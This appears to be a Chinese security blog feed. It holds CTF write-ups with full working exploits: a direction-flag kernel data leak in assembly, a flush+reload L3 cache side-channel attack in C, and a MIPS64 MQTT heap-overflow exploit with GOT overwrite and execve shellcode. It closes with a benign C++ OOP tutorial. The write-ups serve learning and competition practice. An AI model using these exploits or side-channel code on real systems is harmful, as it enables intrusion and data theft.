type: 64-bit Interrupt Gate
p: 1 
DPL: 3

对应的段为
8: 64-bit Code Segment, DPL=0, Non-Conforming, Readable

因此发现只实现了int 0

1
2
mov    ax,0x28
ltr    ax            # 任务寄存器 TR

切换 tr 寄存器变成以下内容

1
TR =0028 ffffffff802007aa 00000065 00008900 DPL=0 TSS64-avl

从 IO读0x1000字节(用户程序)到内存地址0开始的位置上

1
2
3
4
5
6
7
8
9
10
xor    rdi,rdi
mov    ecx,0x1000
mov    dx,0x3fd
in     al,dx
test   al,0x1
je     0xffffffff80200090 
sub    dl,0x5
in     al,dx
stos   BYTE PTR es:[rdi],al
loop   0xffffffff80200090

回到用户态 cs=0x1b ss=0x23 sp=0x2000 ip=0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
mov    ax,0x23
mov    ds,eax
mov    es,eax
mov    fs,eax
mov    gs,eax
xor    rax,rax
xor    rbx,rbx
xor    rcx,rcx
xor    rdx,rdx
xor    rsi,rsi
xor    rdi,rdi
xor    rbp,rbp
xor    r8,r8
xor    r9,r9
xor    r10,r10
xor    r11,r11
xor    r12,r12
xor    r13,r13
xor    r14,r14
xor    r15,r15
push   0x23
push   0x2000
push   0x2
push   0x1b
push   0x0
iretq

跳转至用户程序执行

漏洞分析

通过以上的分析我们知道这是一个用户态程序通过系统调用的漏洞泄露内核数据的题目。int 0对应的handler是0xffffffff8020012a,分析可得是根据rax的值跳转到不同系统调用的过程。我们逐个分析系统调用

1
2
3
4
5
6
7
8
0: exit_handler
1: printstr_handler
2: getchar_handler
3: put_buf1
4: mov_buf1_to_buf2
5: append_buf2_to_buf1
6: print_banner
7: clean_buf2

buf1的长度存储在0xFFFFFFFF8020044C,内容存储在由0xFFFFFFFF80200454开始的0x100字节内。buf2不存储长度,从0xFFFFFFFF80200554开始存储0x100字节。

发现漏洞点在于操作buf1, buf2时,拷贝内存内容使用的是rep movsb,而在循环过程中地址是增加/减少取决于CPU的DF(Direction Flag)。而DF在用户态下就能被std, cld指令设置。

flag存储在buf1前面的位置,利用反方向的rep movsb,我们可以通过syscall_4将flag拷贝到buf2前面的位置,再通过syscall_5使flag的对应字节覆盖buf1前部存储长度的位置,最后利用buf1长度不能超过0x100的特点,通过向syscall_3传入不同长度得到的返回值侧信道得到该字节的值。

exp

官方wp给出了poc,稍微改一下就能得到完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
put_buf1 equ 3
mov_buf1_to_buf2 equ 4
append_buf2_to_buf1 equ 5
[org 0x0]
[bits 64]

test:
    mov rdi,buffer
    mov ecx,dword [idx]
    mov eax,put_buf1
    int 0x0
    std
    mov eax,mov_buf1_to_buf2
    int 0x0
    cld
    mov rdi,buffer
    mov ecx,dword [idx]
    sub ecx,9
    mov eax,put_buf1
    int 0x0
    std
    mov ecx,dword [idx]
    mov eax,append_buf2_to_buf1
    int 0x0
    cld
    mov ecx,256
test_loop:
    sub ecx,1
    mov r9,rcx
    mov rdi,buffer
    mov eax,put_buf1
    int 0x0
    cmp rax,-1
    jz test_loop

    mov ecx,256
    sub rcx,r9
    cmp ecx,1
    je fin
    mov eax, dword [idx]
    mov byte [flag+eax-18],cl
    inc eax
    mov dword [idx], eax
clear:
    mov eax,7
    int 0x0
    mov ecx,0x100
    mov eax,append_buf2_to_buf1
    int 0x0
    jmp test

fin:
    mov rsi,flag
    mov edi,dword [idx]
    sub edi,19
    add rsi,rdi
    mov eax,1
    std
    int 0x0
exit:
    hlt

buffer:
    times 255 db "a"
    db 0
flag:
    times 128 db 0
idx dd 18

参考资料

DASCTF6月二进制专项赛官方wp

intel开发者手册

]]> 第一次看这么底层的东西,长见识了 flush+reload学习笔记 https://zqy.ink/2023/07/18/flush_reload/ 2023-07-18T13:57:13.000Z 2025-11-14T08:20:36.883Z 前言

flush+reload是一个基于prime+probe的LLC(Last-Level-Cache)侧信道攻击手法。它相比其它基于缓存的侧信道攻击手法的特点是,因为攻击利用LLC,所以被攻击程序(victim)和间谍程序(spy)可以运行在不同的核心中、虚拟化环境中,得到的结果分辨率高、噪声低。

本攻击手法适用于多种架构和操作系统环境。下面本文将介绍在x86_64架构下、linux系统的L3缓存侧信道攻击原理及实践。

前置知识

MFENCE、LFENCE

MFENCE指令用于序列化对内存的读取、写入顺序,LFENCE指令用于序列化指令的执行,从而避免乱序执行、并行执行导致测量代码段周围的指令在段内执行,从而影响测量时间的精确度。

RDTSC

RDTSC读取处理器的时间戳计数器(Time-Stamp Counter),得到一64位值,将其存储在EDX:EAX中。用于测量代码段的执行时间。

CLFLUSH

CLFLUSH(Cache Line Flush)指令用于将cache line中的数据刷新到内存中,以保证内存和缓存间的一致性。CLFLUSH指令有一个操作数,即指定的内存地址(通常是cache line的起始地址)。CLFLUSH指令会将该地址对应的cacheline中的数据刷新到内存中,从而使cache line中的对应数据被清除。在下一次访问同样的地址时,CPU会从内存中重新加载数据。

Page Sharing

在一些情况下,多个进程可能会共享相同的内存页,这样做主要有两个可能的原因。一、多个进程间通过共享内存实现进程间通信。二、多个进程拥有相同的内存内容(如执行相同可执行文件时,多个进程的.text段;动态库的代码段和数据段共享等),此时操作系统会将它们映射到同样的物理页框上,从而节省内存、提高性能。当一个进程修改了共享的内存页时,linux会通过“写时复制(Copy-on-Write)”机制创建一个新的私有副本,并将修改的内容赋值到新的页框中,从而避免影响到其他进程。

缓存结构

在x86架构下,从L3缓存中读取数据要比从内存中读取快得多,因此处理器会将最近使用的内存数据暂存在L3缓存中。

攻击原理

当系统中的两个进程(victim和spy)存在共享内存页时,若victim访问了页上的某个数据,这个数据会被加载到L3缓存中。我们通过spy测量加载某个地址的时间的长短,判断出victim访问的是不是这个地址。具体的过程可以分为以下三步:

  1. spy从缓存中清除某个地址的数据(flush)
  2. spy等待victim访问敏感数据
  3. spy重新加载这个地址的数据,测量读取消耗的时间(reload)

我们可以通过以下代码实现这个攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int probe(void* addr) {
    volatile unsigned long time;
    asm __volatile__ (
        " mfence \n" 
        " lfence \n" 
        " rdtsc \n"
        " lfence \n"
        " movl %%eax, %%esi  \n" //eax存储了时间戳计数器的后32位
        " movl (%1), %%eax   \n" //读取addr
        " lfence             \n"
        " rdtsc \n"
        " subl %%esi, %%eax  \n" //将两次得到的时间相减,得到耗时
        " clflush 0(%1)      \n" //flush
        : "=a" (time)
        : "c" (addr)
        :  "%esi", "%edx"
    );
    return time;
 }

例题

DASCTF 2023年6月 二进制专项赛 EasyStack_Ekko

前面拿到ssh的过程比较ez就不说了

分析靶机环境,root用户正在运行server,且我们作为普通用户没有server文件的访问权限。考虑使用侧信道攻击。

分析libfacenet.so,发现getEmojis()函数返回了共享库内部的.rodata段上的指针。显然这个内存页是会被多个加载了libfacenet的进程共享的。

分析server

1
2
3
4
5
6
7
8
9
10
strcpy(v7, "dasctf{xxx_xxxxxxx_xx_xxxx_xxxxx}");
Emojis = getEmojis(a1, a2);
for ( i = 0; ; ++i ) {
    for ( j = 1; j <= 100; ++j ) {
      v5 = Emojis[1000 * (i % 34) + 32 * (v7[i % 34] - '_')];
      setlocale(6, "en_US.utf8");
      printf("-------> %lc \n", v5);
    }
    usleep(10u);
}

server会根据flag读取Emojis不同位置的数据,并且不同位flag对应的数据之间相隔较远。每次读取之间都有usleep(10),提高了我们侧信道攻击的精确度。我们根据flush+reload写一个exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#include <stdio.h>
#include <wchar.h>
#include <unistd.h>

extern wchar_t* getEmojis();


int probe(void* addr) {
    volatile unsigned long time;
    asm __volatile__ (
        " mfence \n"
        " lfence \n"
        " rdtsc \n"
        " lfence \n"
        " movl %%eax, %%esi  \n"
        " movl (%1), %%eax   \n"
        " lfence             \n"
        " rdtsc \n"
        " subl %%esi, %%eax  \n"
        " clflush 0(%1)      \n"
        : "=a" (time)
        : "c" (addr)
        :  "%esi", "%edx"
    );
    return time ;
 }
int test_outL3_time(void* addr) {
    volatile unsigned long time;
    asm __volatile__ (
        " mfence \n"
        " lfence             \n"
        " clflush 0(%0)      \n"
        : 
        : "c" (addr)
        :  
    );
    asm __volatile__ (
        " mfence \n"
        " lfence \n"
        " rdtsc \n"
        " lfence \n"
        " movl %%eax, %%esi  \n"
        " movl (%1), %%eax   \n"
        " lfence             \n"
        " rdtsc \n"
        " subl %%esi, %%eax  \n"
        " clflush 0(%1)      \n"
        : "=a" (time)
        : "c" (addr)
        :  "%esi", "%edx"
    );
    return time ;
 }

unsigned long outL3_time;
unsigned long  inL3_time;
unsigned long average_cache_time;

void TestCache(){
    wchar_t *emo=getEmojis();
    for(int i=1;i<=1000;i++){
        outL3_time+=test_outL3_time(emo);
        wchar_t x=emo[160]; //读取后emo+160应该在L3缓存中
        inL3_time+=probe((emo+160));
    }
    outL3_time/=1000;
    inL3_time/=1000;
    average_cache_time=(inL3_time+outL3_time)/2;
}

int main(){
    TestCache();
    printf("outL3_time=%ld\ninL3_time=%ld\naverage_cache_time=%ld\n",outL3_time,inL3_time,average_cache_time);

    wchar_t *emo=getEmojis();

    int flag[40][40]={0};

    for(int i=7;i<=31;i++){
        for(int j=0;j<=30;j++){
            for(int t=0;t<5000;t++){     
                unsigned long cache_time=probe(emo+i*1000+j*32);
                if(cache_time<average_cache_time){
                    printf("%d-%c---->%lu\n",i,j+'_',cache_time);
                    flag[i][j]++;
                }
                usleep(100); //等待server再次访问目标数据
            }
            printf("--------# %d %c over\n",i,j+'_');
        }
        printf("--------> %d over\n",i);
    }
    
    printf("\n===================\n");
    for(int i=7;i<=31;i++){
        for(int j=0;j<=30;j++){
                if(flag[i][j]>=2)printf("%c",j+'_');
        }
    }
    printf("\nDASCTF{");
    for(int i=7;i<=31;i++){
        int max_count=0;
        char c='#';
        for(int j=0;j<=30;j++){
            if(flag[i][j]>max_count){
            max_count=flag[i][j];
                c=j+'_';
            }
        }
        putchar(c);
    }
    puts("}");
    return 0;
}

如果有位置没有探测到,换用测试次数更多的代码针对位置重新探测即可。最后得到flag

后记

这个攻击的思路比较显而易见,但是具体利用手法方面我也有没搞懂的地方(比如DASCTF那题的官方exp),若有疏漏欢迎指出

参考资料

FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack

DASCTF官方wp

]]> 这个内存读起来它真的快吗?如快! 饶派杯XCTF车联网安全挑战赛 pwn mqttsvr 赛题复现 https://zqy.ink/2023/05/31/mqttsvr/ 2023-05-31T18:25:36.000Z 2025-11-14T08:20:36.943Z 环境准备

题目所给的二进制文件为mips64架构,大端序,需要准备好qemu。

似乎因为内存的关系pwndbg会报错,不知道别的插件怎么样。可以选择自己在原生gdb上写个小脚本,我这里选择ida attach过去(ida调试效率比较低下,需要注意)。

因为mqtt协议客户端都是通过网络发送,而题目文件是通过stdin,stdout接收和发送消息,所以中间需要一个小脚本用来转发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
import socket
context.arch='mips64'
context.log_level='debug'
server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(('0.0.0.0',6666))
server.listen(5)
p=process(['qemu-mips64','-g','1234','-L','./','./server'])
sess,addr=server.accept()
recvlist=[]
while True:
try:
    r=sess.recv(1024)
    recvlist.append(r)
    p.send(r)
    sleep(0.01)
    content=p.recv(1024,timeout=0.2)
    sess.send(content)
except EOFError:
break
#得到发送的bytestring,方便编写exp
print(recvlist)
#重放,方便调试
p=process(['qemu-mips64','-g','12345','-L','./','./server'])
for i in recvlist:
p.send(i)
p.recv()

ida无法对mips64架构生成伪代码,可以使用ghidra生成伪代码,会提升逆向效率

服务端魔改了一点协议,需要找个合适的mqtt客户端进行更改。python的会方便一些,我这里随便找了一个.net xamarin的mqtt实现。

文件分析

小逆一手,最外层是一个while循环判断结束条件,不断调用内部函数,内部函数进行读取、长度的处理,然后进行解析。解析有一个很大的jumptable,很明显。在ghidra中将程序基址设为0可以生成swtich case的伪代码。

与mqtt协议对应看一下,jumptable对应的是不同类型报文的处理。先看Connect,显然被改动过。通过分析0x3200这个函数(这里ghidra的decompiler莫名其妙会似,可以直接ida调试,通过框图的每个branch判断报文是否正确)可以得到connect_flag开始的3个字节分别为0xc2 0x43 0x21。接下来会对clientid进行长度和内容的判断。由于是明文,很好逆出id为Car_MQTT_Client(这里的id不符合协议规范,可能也需要改一下客户端实现),Username则是异或0x3a后与存储的常量进行比较。Password的处理函数0x49f0中存在md5常数,动调发现确实是md5算法,但比较是通过strncmp函数进行比较,并且程序中进行比较的md5常量的第三个字节是00。所以我们只需要固定md5的前三个字节,进行爆破即可。这里我得到的密码是176f00jns{。由此,我们得到了Connect的报文格式和认证信息。

进一步分析发现subscribe和unsubscribe对应的是堆块的申请与释放。在subscribe中,存在堆溢出漏洞。

漏洞利用

由于没有地址随机化,我们不需要泄露地址。uClibc的堆管理器几乎没有安全检查,对于小堆块的处理类似于glibc的fastbin,堆块间通过链表连接。我们很自然地想到通过堆溢出覆盖链表指针地址,实现堆块的任意地址分配,从而实现任意地址写。

我们可以先在堆上布置好/bin/sh字符串,shellcode等gadget,然后通过覆盖got表调用shellcode,完成利用。

exp编写

由于一些库并不支持将raw bytes作为报文内容,因此对于一些报文需要手动调整内容。不过对于大多数报文来说可以直接保存客户端发送的内容,为exp编写节省时间。

在覆盖got表时,如果直接覆盖比较大的大小比如0x120,在malloc时就会出现段错误,这令我非常困惑,也不太清楚原因。所以我将gadget都放在了堆上。

shellcode没找到好用的,自己写了个(/bin/sh字符串地址已知)

1
2
3
4
5
6
7
8
9
10
11
lui $v0,0x4000
dsll $v0,$v0,8
lui $v1,0x311
dsrl $v1,$v1,8
daddu $v0,$v1
daddiu $v0,$v0,0x20
move $a0,$v0
move $a1,$zero
move $a2,$zero
li $v0, 5057
syscall

最终exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
context.arch='mips64'
context.log_level='debug'
recvlist=[b'\x10:\x00\x04MQTT\x04\xc2C!\x00\x0fCar_MQTT_Client\x00\x11Car_Administrator\x00\n176f00jns{', #connect
#paddings for mallocing continuous chunks
    b'\x82%\x00\x01\x00 01000000000000010000000012000000\x02', 
    b'\x82%\x00\x02\x00 010000000000000400000000120000f0\x02', 
    b'\x82%\x00\x03\x00 010000000000000100000000120000w0\x02', 
    #/bin/sh string
    b'\x82%\x00\x04\x00 /bin/sh\x0000a0000400000000120000f0\x02', 
    b'\x82%\x00\x05\x00 0100000000b0000100000000120000w0\x02', 
    b'\x82%\x00\x06\x00 01000000000000000000000000000000\x02', 
    b'\x82%\x00\x07\x00 02000000000000000000000000000000\x02', 
    b'\x82%\x00\x08\x00 03000000000000000000000000000000\x02', 
    #victims
    b'\x82%\x00\t\x00 04000000000000000000000000000000\x02', 
    b'\x82%\x00\n\x00 05000000000000000000000000000000\x02', 
    b'\x82%\x00\x0b\x00 06000000000000000000000000000000\x02', 
    #paddings
    b'\x82%\x00\x0c\x00 07000000000000000000000000000000\x02', 
    b'\x82%\x00\r\x00 08000000000000000000000000000000\x02', 
    b'\x82%\x00\x0e\x00 09000000000000000000000000000000\x02', 
    #free 6,5,4
    b'\xa2$\x00\x0f\x00 06000000000000000000000000000000', 
    b'\xa2$\x00\x10\x00 05000000000000000000000000000000', 
    b'\xa2$\x00\x11\x00 04000000000000000000000000000000', 
    #shellcode
    b"\x82\x4d\x00\x12\x00\x48\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x3c\x02\x40\x00\x00\x02\x12\x38\x3c\x03\x03\x11\x00\x03\x1a\x3a\x00\x43\x10\x2d\x64\x42\x00\x20\x00\x40\x20\x25\x00\x00\x28\x25\x00\x00\x30\x25\x24\x02\x13\xc1\x00\x00\x00\x0c\x02", 
    #heap overflow
    b'\x82\xa5\x02\x00\x13\x01 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x00\x00\x00@\x00\x01r(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02', 
    b'\x82%\x00\x14\x00 07000000000000000000000000000000\x02', 
    #malloc to got[free_ptr] and change it to shellcode addr
    b'\x82%\x00\x15\x00 \x00\x00\x00@\x00\x03\x13@\x00\x00\x00@\x00\x03\x13@\x00\x00\x00@\x00\x03\x13@\x00\x00\x00@\x00\x03\x13@\x02', 
    #free to call shellcode
    b'\xa2$\x00\x16\x00 01000000000000000000000000000000']

p=process(['qemu-mips64','-L','./','./server'])
for i in recvlist:
p.send(i)
p.recv(timeout=1)
p.interactive()
]]> xdm,和mips64爆了吧 cpp与面向对象编程 https://zqy.ink/2023/05/24/oop_in_cpp/ 2023-05-24T08:14:44.000Z 2025-11-14T08:20:36.883Z 前言

最近学了两三个月C++,对于C++中的OOP编程有了一些心得体会,于是在这里写一篇教学性质的文章。因为还在学习,所以(很可能)有谬误,还请不吝指出,给大家磕头了((

C++基础知识

引用

相信大家已经对指针(pointer)不陌生了,引用(reference)与指针非常类似,但是有以下特点:

  1. 指针可以为nullptr;而引用在语义上不能为空(注意这并不意味着引用不会发生Use After Free的情况,在写码时要注意被引用对象的生命周期不能短于引用的生命周期)
  2. 指针是值,可以修改;而引用相当于一个“别名”,一旦绑定不可修改
  3. 在使用指针指向的对象时,首先要解引用(即使用*);而引用可以被视作指向的对象本身,不需要使用*运算符
  4. 引用包含左值引用和右值引用,在对象构造时有着重要作用

由于在C++中,值可以被隐式转换为对其的引用,因此我们要注意变量实际的类型。

左值引用

左值(lvalue)就是在内存当中存储的值,之所以被称作左值是因为它常常在赋值号的左边。

比较简单的理解,左值就是能取内存地址的值。左值引用就是对左值的引用。

当然,左值不一定是可修改的,例如字符串常量是左值,但不可被修改。

1
2
3
4
5
6
7
8
9
#include<iostream>
void foo(int& i){
    i++;
}
int main(){
    int a=3;
    foo(a); //虽然a是int型,但是此处foo只接受int&类型的参数,所以a被隐式转换为对a的引用
    std::cout<<a<<std::endl;
}

右值引用

右值(rvalue)就是“不是左值的值”,常在赋值号的右边。比如字面量、表达式的运算结果等。右值包含亡值(xvalue)和纯右值(prvalue),前者指被临时存储但是即将被抛弃的对象(例如表达式的求值结果),而纯右值为不是亡值的右值,例如字面量。

乍一看右值引用似乎有些鸡肋,但右值引用主要用于对象的移动上,亡值有着“即将被抛弃”的语义,可以很好描述对象的移动语义(所有权的转移)。

在C++中,右值引用使用两个&号表示。右值引用是可以被更改的。

1
2
3
4
5
6
7
8
#include<iostream>
int main(){
    int&& a = 3;
    std::cout<<a<<std::endl; //3
    a++; 
    std::cout<<a<<std::endl; //4
    return 0;
}

常量左值引用

类似于指针,我们在左值引用前加上const就能声明这个引用的对象不可被更改。特别地,常量左值引用可以指向一个右值。在C++中,对于任何显式引用临时值的语句,临时值的生命周期都会被延长至引用的生命周期。(For any statement explicitly binding a reference to a temporary, the lifetime of all temporaries in the statement are extended to match the lifetime of the reference.)

1
2
3
4
5
6
7
8
9
#include<iostream>
void foo(const int& i){
    std::cout<<i<<std::endl;
    //在这里不能更改i
}
int main(){
    foo(3); //可以传入右值
    return 0;
}

OOP(Object-Oriented Programming)

对象

对象(object),比较直观的理解就是一个“东西”。面向对象编程,就是把我们要处理的逻辑、事务都抽象为一个个不同“类”(class)的对象。为了方便我们的抽象,对象有着好用的特性(封装、继承、多态)。

自然地,每个对象拥有自己的属性和方法。比如我用一个类表示书,那么书的属性可能有:标题、内容、封皮颜色等,书的方法可能有更改内容、阅读等。一个对象的方法是与这个对象有关的操作(不一定更改这个对象)。在实践中,我们按需要定义一个类的属性和方法。

在C++中,我们称一个类包含的值为“成员”,包含的方法为“成员方法”,依然用上面的例子,在C++中,我们这样声明一个类:

1
2
3
4
5
class book {
    std::string title; //成员
    std::string content; //成员
    void read(); //成员方法
};

我们这样实现一个类的方法

1
2
3
void book::read() {
    std::cout<<content<<std::endl;
}

一个类只是描述了一类对象,并不描述一个具体的对象。例如apple类描述了苹果,但是我手中的苹果、别人手中的苹果、超市里的苹果亦有差别。我们将这样具体的对象称作类的实例(instance)。在C++中,我们用声明变量的方式得到对象的实例。

1
book b; //现在我拥有了一个变量b,为book类的实例

类似于C中的malloc和free,在C++中,我们使用operator new和operator delete处理在堆上的对象实例。

1
2
book* b = new book();
delete b;

至此,我们的类看起来似乎和结构体区别不大。下面我们就来介绍一下类与结构体不同的特性

封装

在一个类中,常有一些东西不应被其他类访问。例如一些辅助函数。在程序员使用我们写的类的时候,我们不希望这些东西对外访问给程序员造成“这是什么”的困惑,也不希望内部的一些方法被意外调用破坏对象的逻辑。我们可以通过设置这些成员的可见度实现对成员访问的限制。这样的思想体现了类的封装(encapsulation)。

在C++中,我们在成员面前加上访问修饰符即可实现对象成员“可见度”的定义。C++中的访问修饰符包含三种

1
2
3
4
成员的访问修饰符
private  仅对当前类可见
protected  对当前类和当前类的派生类可见
public  可见

我们将访问修饰符加在对象成员的前面进行修饰

1
2
3
4
5
6
7
8
class book {
public:
    void read_title();
    void read_content();
private:
    std::string title;
    std::string content;
};

这样做是因为(打印好的)书是不能被更改的,只能读,所以我们不希望外部代码更改我们书籍的title和content,于是将它设为private。(当然,将其设为const也有不能进行更改的语义,然而考虑到我们的book类可能需要读取书籍文件获取title和content,因此会涉及到成员的更改,不应设为const)

继承

类往往不是孤立的,类与类之间存在着一些联系,因此有了“继承”(inheritance)的概念。通过继承,派生类可以得到基类的属性和方法,从而提高代码复用性和可维护性。例如程序中包含两个类fruit和apple,显然apple是fruit的一种,因此apple应是fruit的派生类(derived class)。

这时我们注意到一个问题,当派生类继承基类(base class)时,基类成员的可访问性是怎样的?在派生类中,基类成员的可访问性自然如上节所讲。但是在外部类中呢?C++在继承时也提供了访问修饰符public, protected和private,让我们选择派生类中基类成员对外的可访问性。

1
2
3
4
继承的访问修饰符
private  基类成员对外全不可见,即变为private
protected  基类public成员和protected成员变为protected,即对派生类可见
public  基类成员的可访问性没有改变,public仍为public,其他亦然

需要注意的是,成员不可访问不代表成员不存在/未被继承。实际上,派生类继承了基类的所有成员,只是无法直接访问基类的private成员。

现在,我们可以这么表示fruit和apple类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <iostream>
enum color {
    red,
    white,
    green,
    blue,
    yellow
};
class fruit {
public:
    color c;
    int size;
};
class apple : public fruit {
public:
    void eat() {
        std::cout<<"emmm...apple tastes sweet"<<std::endl;
    }
};
int main() {
    apple a;
    a.c=red; //apple中的c和size成员从基类fruit中继承
    a.size=30;
    a.eat(); //eat是apple的成员方法,自然可以调用
    return 0;
}

如果以后增加了其他水果,也可以通过这种方式添加,从而避免把基类的成员都copy一遍,使代码更加清晰简洁。

多态

多态(polymorphism),顾名思义,对于一个东西有多种不同的状态。

重载

在编译时的多态主要由函数重载(overload)实现。函数重载指同样名称的函数可以存在多个,每个函数接收不同(种类、数量)的参数,编译器在编译时确定调用的具体是哪个函数。

1
2
3
4
5
6
7
8
9
10
11
12
#include<iostream>
void print_num(int a){
    std::cout<<a<<std::endl;
}
void print_num(int a, int b){
    std::cout<<a<<" "<<b<<std::endl;
}
int main(){
    print_num(3); //3
    print_num(1,2); //1 2
    return 0;
}

虽然这两个函数都叫print_num,但是接收的参数个数不同,因此可以被区分开来。对于对象的方法同理。

虚函数与重写

依然举前面水果的例子,现在有一个人吃早饭,从盒子里随机挑了一个水果吃。假如我的程序要实现这样的逻辑,应该怎么写?

1
2
3
4
5
6
7
??? get_random_fruit(){ //返回值是什么?
    //假如有apple类和orange类,我该怎么返回?
}
int main(){
    get_random_fruit().eat(); //编译器怎么知道调用的是apple::eat还是orange::eat?
    return 0;
}

对于第一个问题,在C++中,一个指向派生类的指针/引用可以被隐式转换为指向基类的指针/引用。即不管具体是apple*还是orange*,都可以隐式变为fruit*类型

1
2
3
4
5
6
7
8
9
10
11
#include<cstdlib>
#include<ctime>
fruit* get_random_fruit(){
    srand(time(nullptr));
    switch(rand()%2){
        case 0:
            return new apple();
        case 1:
            return new orange();
    }
}

而对于第二个问题,我们来认真思考一下。

1
2
3
4
5
6
7
8
9
class fruit {};
class apple : public fruit {
public:
    void eat();
};
class orange : public fruit {
public:
    void eat();
};

要是这么写,对于返回的fruit*类型对应的对象,根本没有eat方法,编译器显然不会接受对它调用eat方法。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include<iostream>
class fruit {
public:
    void eat() {}
};
class apple : public fruit {
public:
    void eat() {
        std::cout<<"emm...apple tastes sweet"<<std::endl;
    }
};
class orange : public fruit {
public:
    void eat() {
        std::cout<<"ehh...orange tastes sour"<<std::endl;
    }
};

要是这么写,fruit对象虽然可以调用eat了,但是编译器不知道函数返回的fruit*指向的究竟是fruit, apple还是orange,所以编译器根据fruit*类型,会调用fruit::eat

对于这样的问题,我们可以用虚函数(virtual function)和重写(override)解决

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include<iostream>
class fruit {
public:
    virtual void eat() {}
};
class apple : public fruit {
public:
    void eat() override {
        std::cout<<"emm...apple tastes sweet"<<std::endl;
    }
};
class orange : public fruit {
public:
    void eat() override {
        std::cout<<"ehh...orange tastes sour"<<std::endl;
    }
};

在基类的方法中声明virtual,意味着这个方法是可以被重写的。而在派生类的同名方法中声明override,意味着重写了基类的虚函数。

现在编译器仍然不知道fruit*指向的是哪类对象,但是这三个对象在初始化时都会携带自己的类型信息,其中包含对应的eat方法所在的内存地址,在运行时直接调用类型信息中的函数指针即可。(关于这一点,我们会在接下来的章节中进一步讲述)

由此可见,在编译时,我们不考虑fruit*具体指向的是什么类型的对象,在运行时我们直接根据类型信息寻找调用的方法的内存地址即可。这体现了运行时多态。

抽象类与接口

对于上面的例子,fruit, apple和orange,有这样一个问题。现实中存在苹果,存在橙子,但不存在一个具体的水果种类叫“水果”。因此,我们不应该有fruit类的实例,而只应有apple和orange类的实例。

在C++中,我们通过将类的成员方法声明为纯虚函数(pure virtual function)来表示一个类为抽象类(abstract class)。我们不能初始化抽象类的实例。

1
2
3
4
5
6
7
8
class fruit{
public:
    virtual void eat() = 0; //声明为纯虚函数
};
int main(){
    fruit f; //编译时错误
    return 0;
}

然而,能吃的不一定是水果,甚至不一定是食物,也可能是药物,或者我觉醒了奇怪的xp之后什么都想吃(?),那么eat方法所在的基类究竟该是什么?我们注意到我们吃的东西都有一个特征“能被吃”,我可以将这个特征抽象为一个接口(interface),将其称为IEatable,凡是继承并实现了这个接口的成员方法的类,都可以调用eat方法。通过接口,我们解耦了相关的逻辑,使得代码更加清晰。

在C++语言中并没有interface这一概念,我们可以通过写抽象类实现接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include<iostream>
class IEatable {
public:
    virtual void eat() = 0;
};
class ICuttable {
public:
    virtual void cut() = 0;
};
class apple : public IEatable, public ICuttable {
public:
    void eat() override {
        std::cout<<"this apple tastes good"<<std::endl;
    }
    void cut() override {
        std::cout<<"this apple is cut into pieces!"<<std::endl;
    }
};

在这里,我们的apple既可以吃,也可以切。代码中,apple同时继承了多个基类,这被称为多继承。

C++中的对象

构造函数

当新建一个类的实例时,对象要被初始化。初始化对应的函数就叫做构造函数(constructor)。

在构造函数中,对象常常通过接收到的参数设置自身的成员,完成初始化操作;或是为自己的成员申请内存。声明构造函数与声明方法类似,只不过构造函数没有且不标注返回值,名称与类名相同,且不能为虚函数。与方法类似,构造函数受访问修饰符修饰,且可以被重载。

1
2
3
4
5
6
7
8
class apple {
public:
    apple(int size) {
        this->size=size;
    }
private:
    int size;
};

